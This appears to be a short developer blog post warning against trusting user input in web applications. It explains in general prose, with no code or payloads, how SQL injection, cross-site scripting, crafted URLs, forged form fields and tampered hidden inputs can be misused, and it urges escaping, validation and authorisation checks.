Sanitizing Input Strings

Preventing Problematic Output

Seeing and Doing Things They Shouldn't

<input type="hidden"> Isn't Hidden

Other Inputs That Can Be Modified

Sanitizing Input Strings

Preventing Problematic Output

Seeing and Doing Things They Shouldn't

<input type="hidden"> Isn't Hidden

Other Inputs That Can Be Modified

massmind - Get Together - Never trust user input

Never trust user input

Events Calendar

Recent Posts (more...)

One of the most common security issues I see in code from new web developers (and even some experienced ones) is not sanitizing user input. They trust user input to have always come from a non-adversarial user interacting with the site through a web browser. Given the HTTP(S) protocol, there is absolutely no reason this needs to be the case. There are lots of ways a mischievous person can send data to your website by going through the browser, or by not using a browser at all. Even users who are not trying to be malicious can cause you trouble.

Most developers are aware of SQL Injection attacks and know how important it is to sanitize input strings such as names, email addresses and any other content. (kxcd has a very funny cartoon about such exploits). Steve Friedl has a good article on how attackers find such holes in your applications. It's critical for web application security that you make sure inputs are properly escaped before using them in database queries. Perhaps in a future post I'll talk about some strategies for doing that more effectively. And remember that you must sanitize all input, not just strings. Sure, you have a <select> list to allow the user to pick which type of pizza they want and you've given them numbers (1 = cheese, 2 = sausage, 3 = veggie combo, etc.) but that doesn't stop someone from sending you a request where the pizza type is a string with instructions to change the admin email address to their own.

But it's not just SQL Injection attacks we must be concerned about with sanitizing user input. What happens to your application if a user can put HTML in their user name and that user name is displayed to other users? It doesn't take much for an enterprising user to include in their user name a <script> tag that loads a malicious JavaScript file on everyone's machine who looks at a page with their user name on it. That's why it's very important to either filter such data out and/or make sure you turn < and > into their HTML entities. Cross-site scripting exploits are usually what result from bugs here. In general, you want to be careful about any data you send back to a user that you've received from a user.

It's also possible, for malicious users to craft URLs that aren't designed to take the site down, but to view data that they shouldn't have access to. For example, let's say you have a website running a content management system, you should never assume that just because you don't have a link to item #345 on a page that a non-registered user can find, that some enterprising user (or even an enterprising web search crawler) can't find that page. One web application I'm aware of had a problem with its team-based private chat (which has since been fixed). There was nothing to check that the user was on the team they were requesting the chat stream for. So, anyone could read the "team-only" chat if they just created the right URL with the right team number (and the team numbers were easily findable on the game page).

An even more subtle issue that we've encountered is making sure users don't select an option they don't have the privilege of making. For example, let's say you have a checkbox for "Is Administrator" when creating a new user and you don't show that checkbox if the user creating or editing the account is not an administrator themselves. But, what happens if a normal user adds that value to their request? Do you still save that value as the "Is Administrator" flag? Arguing that "Oh, no one will figure out the name of that checkbox" is just security through obscurity. Someone may eventually find that hole.

A related issue is using hidden <input> elements to store data. Remember that these are visible to the user and also can be tampered with if someone wants to create their own HTTP request. So don't trust them when they come back. For example, if you store the id number of the item being edited, when the request comes back to save that item, make sure you validate that the user has the authority to edit the item number referenced in the request so they don't switch to a different id. If they do have authority, even if they've changed the id, they aren't doing anything they don't have privileges to do anyway.

There are other inputs to your web application that are "user input" which you need to be aware of too - things like request variables - which you may feel are only set by browsers can be hand crafted by a malicious program.

So, make sure you are careful about all the inputs that are coming into your web application. There certainly are malicious people out there, trying to cause trouble.

October 2024